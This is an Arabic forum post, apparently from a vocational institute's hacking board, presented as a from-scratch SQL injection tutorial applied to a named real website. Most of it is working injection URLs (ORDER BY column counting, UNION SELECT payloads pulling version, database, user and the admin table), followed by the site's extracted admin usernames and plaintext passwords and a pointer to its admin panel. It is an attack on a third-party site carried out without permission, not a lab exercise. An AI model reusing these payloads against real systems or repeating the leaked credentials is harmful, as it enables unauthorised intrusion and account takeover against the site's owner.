أهلا وسهلا بك إلى منتديات مديرية التكوين المهني.

منتدى المتربصين
 
الرئيسيةPortailمكتبة الصورس .و .جالتسجيلدخول
اهلا بكم في منتديات معهد الوطني المنتخصص في التكوين و التعليم المهنيين - نوميرات -غاردية
المواضيع الأخيرة
» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:57 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:55 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:53 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:51 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:50 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:49 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:42 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:40 من طرف علي رجب حسين

» جامعة المدينة العالمية
الإثنين 27 يوليو - 23:37 من طرف علي رجب حسين


شاطر | 
 

 تعليم sql injection من الصفر و التطبيق على احدى المواقع

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
avatar

Messages : 153
Date d'inscription : 06/05/2009

مُساهمةموضوع: تعليم sql injection من الصفر و التطبيق على احدى المواقع   الأحد 25 أكتوبر - 17:18

قررت بمشيئة الله كتابة موضوع ل sql njection و تطبيق على احدى المواقع انشاء الله


http://www.u1job.com
وجدت هذا الموقع مصاب بالحقن يستخدم aspx مع MySQL مع العلم ان اصعب حقن هو لمواقع aspx بسبب قوة framework

بسم الله نبدا

http://www.u1job.com/news_detail.aspx?id=10

في هذا الجزء مصاب بالحقن لتتاكد من صحة كلامي اضف ' الى url و ستحصل على خطأ في الصفحة

بعد ذالك نستخرج عدد الاعمدة تابع فقط

http://www.u1job.com/news_detail.aspx?id=10+order+by+1 //ليس هناك خطا
http://www.u1job.com/news_detail.aspx?id=10+order+by+2 //ليس هناك خطا
http://www.u1job.com/news_detail.aspx?id=10+order+by+3 //ليس هناك خطا
http://www.u1job.com/news_detail.aspx?id=10+order+by+4 //ليس هناك خطا
http://www.u1job.com/news_detail.aspx?id=10+order+by+5 //ليس هناك خطا
http://www.u1job.com/news_detail.aspx?id=10+order+by+6 //ليس هناك خطا
http://www.u1job.com/news_detail.aspx?id=10+order+by+7 //هناك خطا

حلو ادن عدد الاعمدة هو 6
الخطوة التالية هي معرفة الاعمدة التي تظهر في الصفحة لذالك نكتب

http://www.u1job.com/news_detail.asp...+1,2,3,4,5,6--

طيب الرقم 3 و 4 ظهرو لنا في الصفحة هذا يعني ان الاستغلال سنكتبه اما في العمود 3 او 4 لكي يظهر الناتج
للاستغلال في الصفحة
و بعدين معرفة Version MySQL و هذا مهم جدا

http://www.u1job.com/news_detail.aspx?id=-10+union+select+1,2,version(),4,5,6--

سنحصل على 5.0.51b-community-nt حلو الان استخراج اسم القاعدة و user

http://www.u1job.com/news_detail.aspx?id=-10+union+select+1,2,database(),user(),5,6

الى الان كل تمام
الان استخراج جداول admin للموقع

http://www.u1job.com/news_detail.asp...2561646D696E25

و سنحصل على tb_admin_list
استخراج معلومات الادمن

http://www.u1job.com/news_detail.asp...b_admin_list--

سنحصل على

softtriangle:stssb2002,stssb01:stssb2002

user = softtriangle
passwd = stssb2002

user = stssb01
passwd = stssb2002

الان ندخل على لوحة تحكم الموقع
http://www.u1job.com/admin
ولان مبروك عليك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://numibox.spaces.live.com
 
تعليم sql injection من الصفر و التطبيق على احدى المواقع
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
أهلا وسهلا بك إلى منتديات مديرية التكوين المهني. :: منتدى الكمبيوتر :: الهكر و الاختراقات-
انتقل الى: